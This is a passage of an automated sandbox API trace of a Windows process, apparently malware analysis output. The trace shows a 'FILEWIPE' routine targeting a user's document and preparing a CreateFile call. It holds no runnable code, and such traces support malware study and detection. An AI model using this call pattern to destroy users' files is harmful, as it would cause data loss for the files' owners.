[0173.667] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda08 | out: hHeap=0x8a0000) returned 1 [0173.667] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd618 | out: hHeap=0x8a0000) returned 1 [0173.667] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3a8 | out: hHeap=0x8a0000) returned 1 [0173.667] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba168 | out: hHeap=0x8a0000) returned 1 [0173.667] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda80 | out: hHeap=0x8a0000) returned 1 [0173.670] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deda8 | out: hHeap=0x8a0000) returned 1 [0173.670] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0173.670] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1980 [0173.670] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deda8 [0173.670] CharUpperBuffW (in: lpsz="FILEWIPE", cchLength=0x8 | out: lpsz="FILEWIPE") returned 0x8 [0173.670] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deda8 | out: hHeap=0x8a0000) returned 1 [0173.671] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0173.671] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deda8 [0173.671] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8e1980 [0173.671] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deb78 [0173.671] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda80 [0173.671] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1ad0 [0173.671] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba168 [0173.671] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0173.671] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd3a8 [0173.671] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8debc8 [0173.671] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd618 [0173.671] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ad0 [0173.671] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd618 | out: hHeap=0x8a0000) returned 1 [0173.671] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8defb0 [0173.671] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd618 [0173.671] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda08 [0173.671] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e19f0 [0173.671] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0173.671] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8debf0 [0173.671] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd588 [0173.671] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19f0 [0173.671] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3f0 [0173.671] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db0a8 [0173.671] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0173.672] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1d30 [0173.672] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a20 [0173.672] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def10 [0173.672] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd948 [0173.672] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b60 [0173.672] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4f8 [0173.672] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0173.672] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KwBYebiNhHcjLML\\ZAkF0mR.pps" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\kwbyebinhhcjlml\\zakf0mr.pps")) returned 0x20 [0173.672] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4f8 | out: hHeap=0x8a0000) returned 1 [0173.672] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd948 | out: hHeap=0x8a0000) returned 1 [0173.672] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def10 | out: hHeap=0x8a0000) returned 1 [0173.672] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0173.673] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0173.673] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0173.673] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1d30 [0173.673] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def10 [0173.673] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd948 [0173.673] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a20 [0173.673] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4f8 [0173.673] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0173.673] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KwBYebiNhHcjLML\\ZAkF0mR.pps", lpFindFileData=0x87eda0 | out: lpFindFileData=0x87eda0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xeb965a80, ftCreationTime.dwHighDateTime=0x1d5e7d4, ftLastAccessTime.dwLowDateTime=0xce344270, ftLastAccessTime.dwHighDateTime=0x1d5e50b, ftLastWriteTime.dwLowDateTime=0xce344270, ftLastWriteTime.dwHighDateTime=0x1d5e50b, nFileSizeHigh=0x0, nFileSizeLow=0xa1d4, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="ZAkF0mR.pps", cAlternateFileName="")) returned 0x90ae18 [0173.673] FindClose (in: hFindFile=0x90ae18 | out: hFindFile=0x90ae18) returned 1 [0173.673] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4f8 | out: hHeap=0x8a0000) returned 1 [0173.673] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd948 | out: hHeap=0x8a0000) returned 1 [0173.673] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def10 | out: hHeap=0x8a0000) returned 1 [0173.673] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0173.673] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def10 [0173.673] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd948 [0173.673] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1d30 [0173.674] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4f8 [0173.674] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0173.674] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a20 [0173.674] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec18 [0173.674] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdb10 [0173.674] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b60 [0173.674] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda98 [0173.674] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1960 [0173.674] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d440 [0173.674] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd378 [0173.674] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a90 [0173.674] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18c0 [0173.674] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b20 [0173.674] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee20 [0173.674] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a90 | out: hHeap=0x8a0000) returned 1 [0173.674] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0173.674] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd378 | out: hHeap=0x8a0000) returned 1 [0173.674] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd378 [0173.674] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd378 | out: hHeap=0x8a0000) returned 1 [0173.674] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0173.674] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0173.674] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0173.674] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d440 [0173.675] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b60 [0173.675] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df1e0 [0173.675] CharLowerBuffW (in: lpsz="byte[41428]", cchLength=0xb | out: lpsz="byte[41428]") returned 0xb [0173.675] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x24) returned 0x8dc168 [0173.675] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd378 [0173.675] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1960 [0173.675] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a90 [0173.675] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18c0 [0173.675] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd600 [0173.675] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18f0 [0173.675] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd810 [0173.675] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1770 [0173.675] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd810 | out: hHeap=0x8a0000) returned 1 [0173.675] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0173.675] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd600 | out: hHeap=0x8a0000) returned 1 [0173.675] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0173.675] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a90 | out: hHeap=0x8a0000) returned 1 [0173.675] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0173.675] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18c0 [0173.675] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xa1d4) returned 0xa5f008 [0173.677] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df1e0 | out: hHeap=0x8a0000) returned 1 [0173.677] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0173.677] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dee20 | out: hHeap=0x8a0000) returned 1 [0173.677] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0173.677] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda98 | out: hHeap=0x8a0000) returned 1 [0173.677] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdb10 | out: hHeap=0x8a0000) returned 1 [0173.677] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec18 | out: hHeap=0x8a0000) returned 1 [0173.677] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0173.677] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec18 [0173.677] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdb10 [0173.677] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a20 [0173.677] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda98 [0173.677] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d420 [0173.677] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x24) returned 0x8dc198 [0173.677] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a90 [0173.677] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b20 [0173.677] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd378 | out: hHeap=0x8a0000) returned 1 [0173.677] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0173.677] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dc168 | out: hHeap=0x8a0000) returned 1 [0173.677] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0173.677] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0173.677] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1960 [0173.677] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd378 [0173.678] CharUpperBuffW (in: lpsz="MEMSET", cchLength=0x6 | out: lpsz="MEMSET") returned 0x6 [0173.678] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd378 | out: hHeap=0x8a0000) returned 1 [0173.678] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0173.678] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee20 [0173.678] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8e1960 [0173.678] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df1e0 [0173.678] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd378 [0173.678] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b60 [0173.678] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0c8 [0173.678] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd600 [0173.678] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18f0 [0173.678] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d440 [0173.678] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x24) returned 0x8dc168 [0173.678] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd810 [0173.678] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1770 [0173.678] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0173.678] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd810 | out: hHeap=0x8a0000) returned 1 [0173.678] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0173.678] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dc168 | out: hHeap=0x8a0000) returned 1 [0173.678] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0173.678] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd600 | out: hHeap=0x8a0000) returned 1 [0173.678] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df0c8 | out: hHeap=0x8a0000) returned 1 [0173.678] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0173.678] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8e1b60 [0173.679] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd600 [0173.679] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1770 [0173.679] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0173.679] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8e1770 [0173.679] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd810 [0173.679] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18f0 [0173.679] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0173.679] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd828 [0173.679] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0c8 [0173.679] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9a8 [0173.679] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18f0 [0173.679] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd360 [0173.679] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded80 [0173.679] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fa0 [0173.679] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0173.679] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1aa0 | out: hHeap=0x8a0000) returned 1 [0173.679] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1aa0 | out: hHeap=0x8a0000) returned 1 [0173.679] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1aa0 | out: hHeap=0x8a0000) returned 1 [0173.679] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1aa0 | out: hHeap=0x8a0000) returned 1 [0173.679] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1aa0 | out: hHeap=0x8a0000) returned 1 [0173.679] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1aa0 | out: hHeap=0x8a0000) returned 1 [0173.680] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1aa0 | out: hHeap=0x8a0000) returned 1 [0173.680] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1aa0 | out: hHeap=0x8a0000) returned 1 [0173.680] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ded08 | out: hHeap=0x8a0000) returned 1 [0173.680] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1aa0 | out: hHeap=0x8a0000) returned 1 [0173.680] CharLowerBuffW (in: lpsz="ptr:cdecl", cchLength=0x9 | out: lpsz="ptr:cdecl") returned 0x9 [0173.680] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3f0 | out: hHeap=0x8a0000) returned 1 [0173.680] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0173.680] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3f0 | out: hHeap=0x8a0000) returned 1 [0173.680] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0173.680] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0173.680] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0173.680] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0173.680] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0173.680] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3f0 | out: hHeap=0x8a0000) returned 1 [0173.680] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0173.680] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3f0 | out: hHeap=0x8a0000) returned 1 [0173.680] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0173.680] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0173.680] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0173.680] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0173.680] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0173.680] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3f0 | out: hHeap=0x8a0000) returned 1 [0173.680] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0173.681] LoadLibraryW (lpLibFileName="msvcrt.dll") returned 0x75c90000 [0173.681] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="memset", cchWideChar=7, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7 [0173.681] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="memset", cchWideChar=7, lpMultiByteStr=0x9c26d8, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="memset", lpUsedDefaultChar=0x0) returned 7 [0173.681] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0173.681] GetProcAddress (hModule=0x75c90000, lpProcName="memset") returned 0x75c99790 [0173.681] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3f0 | out: hHeap=0x8a0000) returned 1 [0173.681] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0173.681] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0173.681] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0173.681] FreeLibrary (hLibModule=0x75c90000) returned 1 [0173.681] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0173.681] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0173.681] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0173.681] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILE", cchLength=0x12 | out: lpsz="_WINAPI_CREATEFILE") returned 0x12 [0173.682] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0173.682] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0173.682] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0173.682] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0173.682] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0173.682] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0173.682] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0173.682] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0173.682] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0173.682] PeekMessageW 